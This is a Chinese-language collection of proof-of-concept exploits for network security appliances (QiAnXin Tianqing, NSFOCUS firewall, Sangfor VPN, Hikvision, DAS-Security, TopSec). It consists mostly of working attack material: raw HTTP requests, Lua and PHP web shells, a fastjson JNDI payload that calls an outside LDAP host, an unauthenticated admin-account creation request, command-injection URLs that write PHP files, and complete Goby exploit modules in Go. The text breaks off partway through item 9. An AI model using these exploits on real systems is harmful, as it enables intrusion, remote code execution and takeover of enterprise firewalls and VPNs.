
设备漏洞 PoC 整理

本文内容为互联网上收集,禁止用于非法用途,仅供学习使用!
1、360 天擎任意文件上传
/api/client_upload_file.json 存在任意文件上传漏洞

POST /api/client_upload_file.json?mid=12345678901234567890123456789012&md5=123456
78901234567890123456789012&filename=../../lua/123.LUAC HTTP/1.1
Host: 192.168.11.210
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15
(KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Content-Length: 323
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryLx7ATxHThfk91ox
Q
Referer: http://192.168.11.210
Accept-Encoding: gzip
------WebKitFormBoundaryLx7ATxHThfk91oxQ
Content-Disposition: form-data; name="file"; filename="flash.php"
Content-Type: application/xxxx
if ngx.req.get_uri_args().cmd then
cmd = ngx.req.get_uri_args().cmd
local t = io.popen(cmd)
local a = t:read("*all")
ngx.say(a)
end------WebKitFormBoundaryLx7ATxHThfk91oxQ--
2、网康科技网关 RCE
/scripts/aitrain.php

3、绿盟下一代防火墙任意文件上传漏洞
resourse.php

package exploits

import (
"fmt"
"git.gobies.org/goby/goscanner/goutils"
"git.gobies.org/goby/goscanner/jsonvul"
"git.gobies.org/goby/goscanner/scanconfig"
"git.gobies.org/goby/httpclient"
"net/url"
"strings"
"time"
)

// init registers the Goby check for the NSFOCUS next-generation firewall
// "resourse.php" arbitrary file upload: expJson is the metadata record, the
// first closure is the PoC (verification) and the second is the exploit.
//
// Both closures ignore the port the host was scanned on and address fixed
// ports instead: 8081 for the upload endpoint and 4433 for the mail UI. Both
// write files to the target (a sess_* file and compose.php) and contain no
// cleanup, so every run leaves artifacts behind.
//
// Detection indicators visible in these requests: multipart POSTs to
// /api/v1/device/bugsInfo on TCP 8081 whose part filename begins with "sess_"
// or ends in ".php"; the literal cookie
// PHPSESSID_NF=82c13f359d0dd8f51c29d658a9c8ac71 on
// /mail/include/header_main.php over TCP 4433; a newly written compose.php.
// The metadata's own mitigation is to block access to port 8081 and apply
// the vendor update.
func init() {
expJson := `{
      "Name": "nsfocus resourse.php arbitrary file upload vulnerability",
      "Description": "<p>NSFOCUS Next Generation Firewall is a dedicated security firewall device.<br></p><p>There is an arbitrary file upload vulnerability in the NSFOCUS next-generation firewall bugsInfo/resourse.php file. An attacker can upload a malicious Trojan to gain server permissions.<br></p>",
      "Product": "nsfocus",
"Homepage": "https://www.nsfocus.com.cn/",
"DisclosureDate": "2022-07-18",
"Author": "LittleBlack",
"FofaQuery": "banner=\"PHPSESSID_NF\" || header=\"PHPSESSID_NF\"",
"GobyQuery": "banner=\"PHPSESSID_NF\" || header=\"PHPSESSID_NF\"",
"Level": "3",
      "Impact": "<p>There is an arbitrary file upload vulnerability in the NSFOCUS next-generation firewall bugsInfo/resourse.php file. An attacker can upload a malicious Trojan to gain server permissions.<br></p>",
      "Recommendation": "<p>1. Block 8081 port access. 2. Pay attention to the update of the official website in time: <a href=\"https://www.nsfocus.com.cn/\">https://www.nsfocus.com.cn/</a><br></p>",
"References": [
    "https://fofa.so/"
],
"Is0day": false,
"HasExp": true,
"ExpParams": [
    {
      "name": "cmd",
      "type": "input",
      "value": "system('id');",
      "show": ""
    }
],
"ExpTips": {
    "Type": "",
    "Content": ""
},
"ScanSteps": [
    "AND",
    {
      "Request": {
      "method": "GET",
      "uri": "/test.php",
      "follow_redirect": true,
      "header": {},
      "data_type": "text",
      "data": ""
      },
      "ResponseTest": {
      "type": "group",
      "operation": "AND",
      "checks": [
          {
            "type": "item",
            "variable": "$code",
            "operation": "==",
            "value": "200",
            "bz": ""
          },
          {
            "type": "item",
            "variable": "$body",
            "operation": "contains",
            "value": "test",
            "bz": ""
          }
      ]
      },
      "SetVariable": []
    }
],
"ExploitSteps": [
    "AND",
    {
      "Request": {
      "method": "GET",
      "uri": "/test.php",
      "follow_redirect": true,
      "header": {},
      "data_type": "text",
      "data": ""
      },
      "ResponseTest": {
      "type": "group",
      "operation": "AND",
      "checks": [
          {
            "type": "item",
            "variable": "$code",
            "operation": "==",
            "value": "200",
            "bz": ""
          },
          {
            "type": "item",
            "variable": "$body",
            "operation": "contains",
            "value": "test",
            "bz": ""
          }
      ]
      },
      "SetVariable": []
    }
],
   "VulType": [
      "Code Execution"
      ],
      "Tags": [
      "Code Execution"
      ],
"CVEIDs": [
    ""
],
"CNNVD": [
    ""
],
"CNVD": [
    ""
],
"CVSSScore": "9.5",
"Translation": {
    "CN": {
      "Name": "绿盟下一代防火墙 resourse.php 任意文件上传漏洞",
      "Product": "绿盟下一代防火墙",
      "Description": "<p>绿盟下一代防火墙是一款专用安全防火墙设备。<br></p><p>绿盟下一代防火墙 bugsInfo/resourse.php 文件存在任意文件上传漏洞,攻击者可上传恶意木马,获取服务器权限。<br></p>",
      "Recommendation": "<p>1、阻拦8081端口访问。2、及时关注官网更新:<a href=\"https://www.nsfocus.com.cn/\">https://www.nsfocus.com.cn/</a><br></p>",
      "Impact": "<p>绿盟下一代防火墙 bugsInfo/resourse.php 文件存在任意文件上传漏洞,攻击者可上传恶意木马,获取服务器权限。<br></p>",
      "VulType": [
      "代码执⾏"
      ],
      "Tags": [
      "代码执⾏"
      ]
    },
    "EN": {
      "Name": "nsfocus resourse.php 任意文件上传漏洞",
      "Product": "nsfocus",
      "Description": "<p>NSFOCUS Next Generation Firewall is a dedicated security firewall device.<br></p><p>There is an arbitrary file upload vulnerability in the NSFOCUS next-generation firewall bugsInfo/resourse.php file. An attacker can upload a malicious Trojan to gain server permissions.<br></p>",
      "Recommendation": "<p>1. Block 8081 port access. 2. Pay attention to the update of the official website in time: <a href=\"https://www.nsfocus.com.cn/\">https://www.nsfocus.com.cn/</a><br></p>",
      "Impact": "<p>There is an arbitrary file upload vulnerability in the NSFOCUS next-generation firewall bugsInfo/resourse.php file. An attacker can upload a malicious Trojan to gain server permissions.<br></p>",
      "VulType": [
      "Code Execution"
      ],
      "Tags": [
      "Code Execution"
      ]
    }
},
"AttackSurfaces": {
    "Application": null,
    "Support": null,
    "Service": null,
    "System": null,
    "Hardware": null
}
}`

// The PoC and exploit closures run the same three-request sequence; they
// differ only in the final PHP statement posted in step 3 and in how the
// result is reported.
ExpManager.AddExploit(NewExploit(
    goutils.GetFileName(),
    expJson,
    func(exp *jsonvul.JsonVul, u *httpclient.FixUrl, ss *scanconfig.SingleScanConfig) bool {

      // Step 1: multipart upload of a part named "file" whose filename is
      // sess_<id>. The <id> equals the PHPSESSID_NF cookie value presented in
      // step 3, so this is presumably a PHP session file; its body is a
      // serialized "lang" value holding a directory-traversal path that ends
      // in /tmp/. TODO confirm the mechanism against the product before
      // relying on this description.
      u1 := httpclient.NewFixUrl("https://" + u.IP + ":8081")
      uri1 := "/api/v1/device/bugsInfo"
      cfg1 := httpclient.NewPostRequestConfig(uri1)
      cfg1.VerifyTls = false
      cfg1.FollowRedirect = false
      cfg1.Header.Store("Content-Type", "multipart/form-data; boundary=1d52ba2a11ad8a915eddab1a0e85acd9")
      cfg1.Data = "--1d52ba2a11ad8a915eddab1a0e85acd9\r\nContent-Disposition: form-data; name=\"file\"; filename=\"sess_82c13f359d0dd8f51c29d658a9c8ac71\"\r\n\r\nlang|s:52:\"../../../../../../../../../../../../../../../../tmp/\";\r\n--1d52ba2a11ad8a915eddab1a0e85acd9--\r\n"
      if resp, err := httpclient.DoHttpRequest(u1, cfg1); err == nil && resp.StatusCode == 200 && strings.Contains(resp.RawBody, "upload file success") {
      // Fixed 5 s pause before the second upload; the reason is not visible
      // in this code (presumably gives the server time to pick up the file).
      time.Sleep(time.Second * 5)
      // Step 2: second upload to the same endpoint writes compose.php, a PHP
      // eval() web shell. It is left on the target; nothing removes it.
      uri2 := "/api/v1/device/bugsInfo"
      cfg2 := httpclient.NewPostRequestConfig(uri2)
      cfg2.VerifyTls = false
      cfg2.FollowRedirect = false
      cfg2.Header.Store("Content-Type", "multipart/form-data; boundary=4803b59d015026999b45993b1245f0ef")
      cfg2.Data = "--4803b59d015026999b45993b1245f0ef\r\nContent-Disposition: form-data; name=\"file\"; filename=\"compose.php\"\r\n\r\n<?php eval($_POST);?>\r\n--4803b59d015026999b45993b1245f0ef--\r\n"
      if resp2, err2 := httpclient.DoHttpRequest(u1, cfg2); err2 == nil && resp2.StatusCode == 200 && strings.Contains(resp2.RawBody, "upload file success") {
          // Step 3: POST to the mail UI on :4433 with the hard-coded session
          // cookie. The body "1=print md5(1);" is considered successful when
          // md5("1") appears in the response. The `err` declared here is a
          // new variable that shadows step 1's, not a reuse of it.
          u3 := httpclient.NewFixUrl("https://" + u.IP + ":4433")
          uri3 := "/mail/include/header_main.php"
          cfg3 := httpclient.NewPostRequestConfig(uri3)
          cfg3.VerifyTls = false
          cfg3.FollowRedirect = false
          cfg3.Header.Store("Cookie", "PHPSESSID_NF=82c13f359d0dd8f51c29d658a9c8ac71")
          cfg3.Header.Store("Content-Type", "application/x-www-form-urlencoded")
          cfg3.Data = "1=print+md5%281%29%3B"
          if resp3, err := httpclient.DoHttpRequest(u3, cfg3); err == nil {
            return resp3.StatusCode == 200 && strings.Contains(resp3.RawBody, "c4ca4238a0b923820dcc509a6f75849b")
          }

      }
      }

      // Any failed or non-matching step falls through to "not vulnerable".
      return false
    },
    func(expResult *jsonvul.ExploitResult, ss *scanconfig.SingleScanConfig) *jsonvul.ExploitResult {
      // Unchecked type assertion: panics if the "cmd" parameter is absent or
      // is not a string.
      cmd := ss.Params["cmd"].(string)

      // Steps 1 and 2 are identical to the PoC above (same session id, same
      // compose.php), so repeated exploit runs re-upload the same two files.
      u1 := httpclient.NewFixUrl("https://" + expResult.HostInfo.IP + ":8081")
      uri1 := "/api/v1/device/bugsInfo"
      cfg1 := httpclient.NewPostRequestConfig(uri1)
      cfg1.VerifyTls = false
      cfg1.FollowRedirect = false
      cfg1.Header.Store("Content-Type", "multipart/form-data; boundary=1d52ba2a11ad8a915eddab1a0e85acd9")
      cfg1.Data = "--1d52ba2a11ad8a915eddab1a0e85acd9\r\nContent-Disposition: form-data; name=\"file\"; filename=\"sess_82c13f359d0dd8f51c29d658a9c8ac71\"\r\n\r\nlang|s:52:\"../../../../../../../../../../../../../../../../tmp/\";\r\n--1d52ba2a11ad8a915eddab1a0e85acd9--\r\n"
      if resp, err := httpclient.DoHttpRequest(u1, cfg1); err == nil && resp.StatusCode == 200 && strings.Contains(resp.RawBody, "upload file success") {
      time.Sleep(time.Second * 5)
      uri2 := "/api/v1/device/bugsInfo"
      cfg2 := httpclient.NewPostRequestConfig(uri2)
      cfg2.VerifyTls = false
      cfg2.FollowRedirect = false
      cfg2.Header.Store("Content-Type", "multipart/form-data; boundary=4803b59d015026999b45993b1245f0ef")
      cfg2.Data = "--4803b59d015026999b45993b1245f0ef\r\nContent-Disposition: form-data; name=\"file\"; filename=\"compose.php\"\r\n\r\n<?php eval($_POST);?>\r\n--4803b59d015026999b45993b1245f0ef--\r\n"
      if resp2, err2 := httpclient.DoHttpRequest(u1, cfg2); err2 == nil && resp2.StatusCode == 200 && strings.Contains(resp2.RawBody, "upload file success") {
          u3 := httpclient.NewFixUrl("https://" + expResult.HostInfo.IP + ":4433")
          uri3 := "/mail/include/header_main.php"
          cfg3 := httpclient.NewPostRequestConfig(uri3)
          cfg3.VerifyTls = false
          cfg3.FollowRedirect = false
          cfg3.Header.Store("Cookie", "PHPSESSID_NF=82c13f359d0dd8f51c29d658a9c8ac71")
          cfg3.Header.Store("Content-Type", "application/x-www-form-urlencoded")
          // Step 3 differs from the PoC only here: the user-supplied PHP
          // statement is URL-encoded into the POST body, and the raw response
          // body becomes Output. A non-200 reply leaves Success false.
          cfg3.Data = fmt.Sprintf("1=%s", url.QueryEscape(cmd))
          if resp3, err := httpclient.DoHttpRequest(u3, cfg3); err == nil && resp3.StatusCode == 200 {
            expResult.Output = resp3.RawBody
            expResult.Success = true
          }

      }
      }
      return expResult
    },
))
}
4、深信服 VPN 任意用户添加漏洞
用户管理接口的权限控制出现漏洞,攻击者可任意添加用户

POST /cgi-bin/php-cgi/html/delegatemodule/HttpHandler.php?controler=User&action=AddUser&token=e52021a4c9c962ac9cc647effddcf57242d152d9 HTTP/1.1
Host: xxxxxx
Cookie:language=zh_CN;sinfor_session_id=W730120C88755A7D932019B349CCAC63;PHPSESSID=cb12753556d734509d4092baabfb55dd;x-anti-csrf-gcs=A7DBB1DC0050737E;usermrgstate=%7B%22params%22%3A%7B%22grpid%22%3A%22-1%22%2C%22recflag%22%3A0%2C%22filter%22%3A0%7D%2C%22pageparams%22%3A%7B%22start%22%3A0%2C%22limit%22%3A25%7D%2C%22otherparams%22%3A%7B%22searchtype%22%3A0%2C%22recflag%22%3Afalse%7D%7D;hidecfg=%7B%22name%22%3Afalse%2C%22flag%22%3Afalse%2C%22note%22%3Afalse%2C%22expire%22%3Atrue%2C%22lastlogin_time%22%3Atrue%2C%22phone%22%3Atrue%2C%22allocateip%22%3Atrue%2C%22other%22%3Afalse%2C%22state%22%3Afalse%7D
Content-Length: 707
Sec-Ch-Ua: "Chromium";v="103", ".Not/A)Brand";v="99"
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Sec-Ch-Ua-Mobile: ?0
User-Agent:Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.5060.134 Safari/537.36
Sec-Ch-Ua-Platform: "macOS"
Accept: */*
Origin: https://xxxxxx
X-Forwarded-For: 127.0.0.1
X-Originating-Ip: 127.0.0.1
X-Remote-Ip: 127.0.0.1
X-Remote-Addr: 127.0.0.1
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: https://xxxxxx/html/tpl/userMgt.html?userid=0&groupid=-1&createRole=1
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

name=admin1&note=admin1&passwd=Admin%40123&passwd2=Admin%40123&phone=&grpid=-1&grptext=%2F%E9%BB%98%E8%AE%A4%E7%94%A8%E6%88%B7%E7%BB%84&selectAll=1&b_inherit_auth=1&b_inherit_grpolicy=1&is_Autoip=1&allocateip=0.0.0.0&gqsj=1&ex_time=2027-07-29&is_enable=1&is_public=1&is_pwd=1&first_psw_type=-1&second_server=&auth_type=0&ext_auth_id=&token_svr_id=%E8%AF%B7%E9%80%89%E6%8B%A9&grpolicy_id=0&grpolicytext=%E9%BB%98%E8%AE%A4%E7%AD%96%E7%95%A5%E7%BB%84&roleid=&roletext=&year=&month=&day=&isBindKey=&userid=0&crypto_key=&szcername=&caid=-1&certOpt=0&create_time=&sec_key=&first_psw_name=%E6%9C%AC%E5%9C%B0%E6%95%B0%E6%8D%AE%E5%BA%93&first_psw_id=&second_psw_name=&second_psw_id=&is_extauth=0&secondAuthArr=%5B%5D
5、海康威视综合运营管理平台 RCE 漏洞
URL:

/bic/ssoService/v1/applyCT
Payload:

{"a":{"@type":"java.lang.Class","val":"com.sun.rowset.JdbcRowSetImpl"},"b":{"@type":"com.sun.rowset.JdbcRowSetImpl","dataSourceName":"ldap://xxx.dnstunnel.run","autoCommit":true}}
6、安恒明御网关注入
/webui/?g=aaa_portal_auth_config_reset&type=1
7、安恒数据大脑 API 网关任意密码重置漏洞
在前端代码中包含重置密码的链接以及密码加密方式

安恒数据大脑 API (https://www.websaas.cn/) 存在任意密码重置漏洞

这里以网站 https://waf-mgmt.pinganyun.com/q/#/ 为例,在前端代码中包含重置密码的链接以及密码加密方式,按照前端代码说明,构造重置密码数据包

此处重置的密码为:p@ssw0rd

POST /q/common-permission/public/users/forgetPassword HTTP/1.1
Host: XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:89.0) Gecko/20100101 Firefox/89.0
Accept-Language: en-US,en;q=0.5
Content-type: application/json
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1
Content-Length: 104
{"code":XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX,"rememberMe":false,"use
rname":"admin","password":"XXXXXXXXXXXXXXXXXXXXXXXXXX"}
8、奇安信 天擎安全管理系统 getshell
client_upload_file.json

package exploits

import (
"fmt"
"git.gobies.org/goby/goscanner/goutils"
"git.gobies.org/goby/goscanner/jsonvul"
"git.gobies.org/goby/goscanner/scanconfig"
"git.gobies.org/goby/httpclient"
"strings"
)

// init registers the Goby check for the QiAnXin Tianqing (360-TianQing)
// client_upload_file.json arbitrary file upload. The upload endpoint takes
// the destination name from the "filename" query parameter; both closures
// pass "../../lua/<name>.LUAC", i.e. the parameter is not confined to the
// upload directory. The exploit closure then requests /api/<name>.json,
// which the author evidently expects to route to the uploaded Lua file
// (TODO confirm against the product).
//
// Detection indicators visible in these requests: POST
// /api/client_upload_file.json whose filename parameter contains "../" or
// ends in ".LUAC"; the hard-coded mid/md5 query values and the literal
// SKYLAR…/YII_CSRF_TOKEN cookie below; a follow-up GET to
// /api/<short hex>.json?cmd=…; unexpected new files under the lua/
// directory. Neither closure removes what it uploads.
func init() {
expJson := `{
"Name": "QiAnXin Tianqing terminal security management system client_upload_file.json getshell",
"Description": "There is an arbitrary file upload vulnerability in QiAnXin Tianqing terminal security management system, and the attacker can upload his own webshell to control the server.",
"Product": "360-TianQing",
"Homepage": "https://www.qianxin.com/product/detail/pid/49",
"DisclosureDate": "2021-04-09",
"Author": "itardc@163.com",
"FofaQuery": "app=\"360-TianQing\"",
"GobyQuery": "app=\"360-TianQing\"",
"Level": "3",
"Impact": "",
"Recommendation": "",
"References": [
    "http://fofa.so"
],
"HasExp": true,
"ExpParams": [
    {
      "name": "cmd",
      "type": "input",
      "value": "whoami"
    }
],
"ExpTips": {
    "Type": "",
    "Content": ""
},
"ScanSteps": [
    "AND",
    {
      "Request": {
      "data": "",
      "data_type": "text",
      "follow_redirect": true,
      "method": "GET",
      "uri": "/"
      },
      "ResponseTest": {
      "checks": [
          {
            "bz": "",
            "operation": "==",
            "type": "item",
            "value": "200",
            "variable": "$code"
          }
      ],
      "operation": "AND",
      "type": "group"
      }
    }
],
"ExploitSteps": null,
"Tags": ["getshell"],
"CVEIDs": null,
"CVSSScore": "0.0",
"AttackSurfaces": {
    "Application": ["360-TianQing"],
    "Support": null,
    "Service": null,
    "System": null,
    "Hardware": null
}
}`

ExpManager.AddExploit(NewExploit(
    goutils.GetFileName(),
    expJson,
    func(exp *jsonvul.JsonVul, u *httpclient.FixUrl, ss *scanconfig.SingleScanConfig) bool {
      // PoC: upload the harmless text "hello,world" as ../../lua/<rand>.LUAC
      // (rand is presumably 4 hex characters) and accept `"status":true`
      // plus "upload file success" in the body as proof. Even this benign
      // file stays on the target.
      randomFilename := goutils.RandomHexString(4)
      cfg := httpclient.NewPostRequestConfig(fmt.Sprintf("/api/client_upload_file.json?mid=202cb962ac59075b964b07152d234b10&md5=3cb95cfbe1035bce8c448fcaf80fe7d9&filename=../../lua/%s.LUAC", randomFilename))
      cfg.VerifyTls = false
      cfg.FollowRedirect = false
      // Referer and Cookie are fixed values; whether the server actually
      // requires them is not visible here.
      cfg.Header.Store("Referer", u.FixedHostInfo)
      cfg.Header.Store("Cookie", "SKYLARe6721bd9ccd89f1a7ee7d79d35=71jm0o74c4k934fqechjeau0f7; YII_CSRF_TOKEN=74eae12048c53a096d8053873d9462ad07f1c51cs%3A40%3A%228a2d2746bb28b7bb46f038160b5e2c6d5b095d64%22%3B")
      cfg.Header.Store("Content-Type", "multipart/form-data; boundary=----WebKitFormBoundaryLx7ATxHThfk91oxQ")
      cfg.Data = "------WebKitFormBoundaryLx7ATxHThfk91oxQ\r\n"
      cfg.Data += "Content-Disposition: form-data; name=\"file\"; filename=\"flash.php\"\r\n"
      cfg.Data += "Content-Type: application/xxxx\r\n\r\n"
      cfg.Data += "hello,world\r\n"
      cfg.Data += "------WebKitFormBoundaryLx7ATxHThfk91oxQ--"
      if resp, err := httpclient.DoHttpRequest(u, cfg); err == nil && resp.StatusCode == 200 {
      return strings.Contains(resp.Utf8Html, "\"status\":true") &&
          strings.Contains(resp.Utf8Html, "upload file success")
      }
      return false
    },
    func(expResult *jsonvul.ExploitResult, ss *scanconfig.SingleScanConfig) *jsonvul.ExploitResult {
      // Exploit: upload a Lua handler that passes the "cmd" query argument to
      // io.popen (an OS-command web shell) under the same traversal path,
      // then call it. The md5 query value differs from the PoC's; its role is
      // not visible here.
      randomFilename := goutils.RandomHexString(4)
      cfg := httpclient.NewPostRequestConfig(fmt.Sprintf("/api/client_upload_file.json?mid=202cb962ac59075b964b07152d234b10&md5=88aca4dfc84d8abd8c2b01a572d60339&filename=../../lua/%s.LUAC", randomFilename))
      //cfg := httpclient.NewPostRequestConfig("/api/client_upload_file.json?mid=202cb962ac59075b964b07152d234b10&md5=88aca4dfc84d8abd8c2b01a572d60339&filename=../../lua/sky.LUAC")
      cfg.VerifyTls = false
      cfg.FollowRedirect = false
      cfg.Header.Store("Referer", expResult.HostInfo.FixedHostInfo)
      cfg.Header.Store("Cookie", "SKYLARe6721bd9ccd89f1a7ee7d79d35=71jm0o74c4k934fqechjeau0f7; YII_CSRF_TOKEN=74eae12048c53a096d8053873d9462ad07f1c51cs%3A40%3A%228a2d2746bb28b7bb46f038160b5e2c6d5b095d64%22%3B")
      cfg.Header.Store("Content-Type", "multipart/form-data; boundary=----WebKitFormBoundaryLx7ATxHThfk91oxQ")
      cfg.Data = "------WebKitFormBoundaryLx7ATxHThfk91oxQ\r\n"
      cfg.Data += "Content-Disposition: form-data; name=\"file\"; filename=\"flash.php\"\r\n"
      cfg.Data += "Content-Type: application/xxxx\r\n\r\n"
      cfg.Data += "if ngx.req.get_uri_args().cmd then\r\n"
      cfg.Data += "cmd = ngx.req.get_uri_args().cmd\r\n"
      cfg.Data += "local t = io.popen(cmd)\r\n"
      cfg.Data += "local a = t:read(\"*all\")\r\n"
      cfg.Data += "ngx.say(a)\r\n"
      cfg.Data += "end\r\n"
      cfg.Data += "------WebKitFormBoundaryLx7ATxHThfk91oxQ--"
      // NOTE(review): the upload's response and error are discarded, so the
      // GET below runs even when the upload failed. The uploaded handler is
      // never removed.
      httpclient.DoHttpRequest(expResult.HostInfo, cfg)
      // Unchecked type assertion: panics if "cmd" is absent or not a string.
      cmd := ss.Params["cmd"].(string)
      // NOTE(review): cmd is interpolated into the URL without url.QueryEscape
      // (the PoC file for check #3 escapes its parameter); any space, "&" or
      // "#" in cmd changes the request rather than the command.
      if resp, err := httpclient.SimpleGet(expResult.HostInfo.FixedHostInfo + fmt.Sprintf("/api/%s.json?cmd=%s", randomFilename, cmd)); err == nil && resp.StatusCode == 200 {
      expResult.Success = true
      expResult.Output = resp.Utf8Html
      }
      return expResult
    },
))
}
9、天融信 - 上网行为管理系统 RCE
一句话:

/view/IPV6/naborTable/static_convert.php?blocks=||%20echo%20%27%3C?php%20phpinfo();?%3E%27%20%3E%3E%20/var/www/html/1.php%0a
Base64 版:

/view/IPV6/naborTable/static_convert.php?blocks=||%20echo%20PD9waHAgcGhwaW5mbygpOz8+%20%7Cbase64%20-d%20%3E%3E%20/var/www/html/1.php%0a

package exploits

import (
"git.gobies.org/goby/goscanner/goutils"
"git.gobies.org/goby/goscanner/jsonvul"
"git.gobies.org/goby/goscanner/scanconfig"
"git.gobies.org/goby/httpclient"
"net/url"
"strings"
)

// init registers the Goby check for TopSec TopACM command execution through
// the "blocks" parameter of /view/IPV6/naborTable/static_convert.php. Two
// helper closures are defined first and shared by the PoC and exploit
// closures.
//
// Detection indicators visible in this code: GET requests to that path whose
// blocks value contains "|" followed by shell text; new .php files appearing
// under /var/www/html/ (the directory both the PoC payload and the default
// ExpParams cmd write to). The metadata states that no vendor patch existed
// at disclosure (2022-07-28), so limiting exposure of the management UI and
// watching for the indicators above is what a defender can act on here.
func init() {
expJson := `{"Name":"TopSec TopACM Remote Command Execution","Description":"<p>Topacm comprehensively considers the needs of customers in various industries and provides customers with practical functions such as security strategy, link load, identity authentication, traffic management, behavior control, online audit, log tracing, network supervision docking, user behavior analysis, VPN, etc. The product has good network adaptability and meets the relevant requirements on user behavior audit and log retention in the network security law, Ministry of public security order 151, etc. At present, the products are widely used in government, education, energy, enterprises, operators and other industries to help customers standardize the network, improve work efficiency, and mine data value.</p><p>There is an arbitrary command execution vulnerability in the TopSec Internet behavior management system. Attackers can execute arbitrary commands on the system, write files, obtain webshell, and read sensitive information.</p><p>Topacm comprehensively considers the needs of customers in various industries and provides customers with practical functions such as security strategy, link load, identity authentication, traffic management, behavior control, online audit, log tracing, network supervision docking, user behavior analysis, VPN, etc. The product has good network adaptability and meets the relevant requirements on user behavior audit and log retention in the network security law, Ministry of public security order 151, etc. At present, the products are widely used in government, education, energy, enterprises, operators and other industries to help customers standardize the network, improve work efficiency, and mine data value.</p><p>There is an arbitrary command execution vulnerability in the TopSec Internet behavior management system. 
Attackers can execute arbitrary commands on the system, write files, obtain webshell, and read sensitive information.</p>","Product":"TopSec-TopACM","Homepage":"https://www.topsec.com.cn/product/27.html","DisclosureDate":"2022-07-28","Author":"su18@javaweb.org","FofaQuery":"body=\"ActiveXObject\" && body=\"name=\\\"dkey_login\\\" \" && body=\"repeat-x left top\"","GobyQuery":"body=\"ActiveXObject\" && body=\"name=\\\"dkey_login\\\" \" && body=\"repeat-x left top\"","Level":"3","Impact":"<p><span style=\"color: rgb(22, 28, 37); font-size: 16px;\">There is an arbitrary command execution vulnerability in the TopSec Internet behavior management system. Attackers can execute arbitrary commands on the system, write files, obtain webshell, and read sensitive information.</span><br></p>","Recommendation":"<p><span style=\"color: rgb(0, 0, 0); font-size: 16px;\">At present, the manufacturer has not released a security patch. Please pay attention to the official update.<a href=\"https://www.topsec.com.cn/product/27.html\" 
target=\"_blank\">https://www.topsec.com.cn/product/27.html</a></span><br></p>","References":["https://mp.weixin.qq.com/s/5UMEIrDiG5hQFofByYH78g"],"Is0day":false,"HasExp":true,"ExpParams":[{"name":"cmd","type":"input","value":"echo%20PD9waHAgcGhwaW5mbygpOw==%20|base64%20-d%20%3E/var/www/html/3.php","show":""}],"ExpTips":{"Type":"","Content":""},"ScanSteps":["AND",{"Request":{"method":"GET","uri":"/test.php","follow_redirect":false,"header":[],"data_type":"text","data":""},"ResponseTest":{"type":"group","operation":"AND","checks":[{"type":"item","variable":"$code","operation":"==","value":"200","bz":""},{"type":"item","variable":"$body","operation":"contains","value":"test","bz":""}]},"SetVariable":[]}],"ExploitSteps":["AND",{"Request":{"method":"GET","uri":"/test.php","follow_redirect":true,"header":[],"data_type":"text","data":""},"ResponseTest":{"type":"group","operation":"AND","checks":[{"type":"item","variable":"$code","operation":"==","value":"200","bz":""},{"type":"item","variable":"$body","operation":"contains","value":"test","bz":""}]},"SetVariable":[]}],"Tags":["Command Execution"],"VulType":["Command Execution"],"CVEIDs":[""],"CNNVD":[""],"CNVD":[""],"CVSSScore":"9.8","Translation":{"CN":{"Name":"天融信上网行为管理系统命令执行","Product":"天融信-上网行为管理系统","Description":"<p>天融信上网行为管理系统(TopACM)综合考虑各行业客户需求,为客户提供安全策略、链路负载、身份认证、流量管理、行为管控、上网审计、日志追溯、网监对接、用户行为分析、VPN等实用功能。产品具有良好的网络适应性并满足《网络安全法》、公安部151号令、等保2.0等关于用户行为审计和日志留存的相关要求。目前产品广泛应用于政府、教育、能源、企业、运营商等各类行业,协助客户规范网络、提高工作效率、挖掘数据价值。<br></p><p>天融信上网行为管理系统存在任意命令执行漏洞,攻击者可以在系统上执行任意命令,写入文件,获取webshell,读取敏感信息。<br></p>","Recommendation":"<p>目前厂商还未发布安全补丁,请关注官方更新。<a href=\"https://www.topsec.com.cn/product/27.html\" target=\"_blank\">https://www.topsec.com.cn/product/27.html</a></p>","Impact":"<p><span style=\"color: rgb(22, 28, 37); font-size: 16px;\">天融信上网行为管理系统存在任意命令执行漏洞,攻击者可以在系统上执行任意命令,写入文件,获取webshell,读取敏感信息。</span><br></p>","VulType":["命令执⾏"],"Tags":["命令执⾏"]},"EN":{"Name":"TopSec TopACM Remote Command 
Execution","Product":"TopSec-TopACM","Description":"<p>Topacm comprehensively considers the needs of customers in various industries and provides customers with practical functions such as security strategy, link load, identity authentication, traffic management, behavior control, online audit, log tracing, network supervision docking, user behavior analysis, VPN, etc. The product has good network adaptability and meets the relevant requirements on user behavior audit and log retention in the network security law, Ministry of public security order 151, etc. At present, the products are widely used in government, education, energy, enterprises, operators and other industries to help customers standardize the network, improve work efficiency, and mine data value.</p><p>There is an arbitrary command execution vulnerability in the TopSec Internet behavior management system. Attackers can execute arbitrary commands on the system, write files, obtain webshell, and read sensitive information.</p><p>Topacm comprehensively considers the needs of customers in various industries and provides customers with practical functions such as security strategy, link load, identity authentication, traffic management, behavior control, online audit, log tracing, network supervision docking, user behavior analysis, VPN, etc. The product has good network adaptability and meets the relevant requirements on user behavior audit and log retention in the network security law, Ministry of public security order 151, etc. At present, the products are widely used in government, education, energy, enterprises, operators and other industries to help customers standardize the network, improve work efficiency, and mine data value.</p><p>There is an arbitrary command execution vulnerability in the TopSec Internet behavior management system. 
